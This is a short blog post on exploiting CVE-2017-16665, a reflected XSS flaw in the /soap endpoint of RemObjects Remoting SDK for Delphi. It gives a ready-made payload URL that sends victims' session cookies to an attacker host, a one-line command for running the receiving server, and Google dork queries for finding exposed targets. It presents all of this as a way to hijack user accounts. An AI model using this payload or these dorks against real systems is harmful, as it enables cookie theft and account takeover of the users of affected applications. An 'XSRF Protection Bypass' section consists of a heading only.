Exploiting CVE-2017-16665

Posted on December 8, 2017 | 1 minute read

Attack

RemObjects Remoting SDK 9 1.0.0.0 for Delphi is vulnerable to a reflected Cross Site Scripting (XSS) attack via the service parameter to the /soap URI, triggering an invalid attempt to generate WSDL.

RemObjects Remoting SDK
Clients are applications that talk to your servers, and Remoting SDK allows you to add client functionality to apps written in just about any modern programming tool, and for all current platforms: Cocoa developers can use our native Cocoa frameworks from Swift, Objective-C, Oxygene or RemObjects C#

Payload

Many web applications uses this SDK and also expose this via some port pubically. This reflected XSS can be very helpful in hijacking user accounts by simply luring users to click on following URL.

https://victim.com:8099/SOAP?service=<script>document.location='https://attacker.com:9090/somefolder/1.php?cookie='.concat(escape(document.cookie));</script>

Attacker Web Server

python -m SimpleHTTPServer 9090

Google Dorks

RemObjects SDK for delphi v1.0.0
inurl:/SOAP/?service=
RemObjects SDK for Delphi v2.0.1.3
intext:RemObjects SDK for Delphi RemObjects Software, LLC.

Exploit

 XSRF Protection Bypass

References:
  1. CSRF
  2. CVE-2017-16665
  3. RemObjects Bug

tags:Web Attack Exploit Hack Web Exploit 0-Day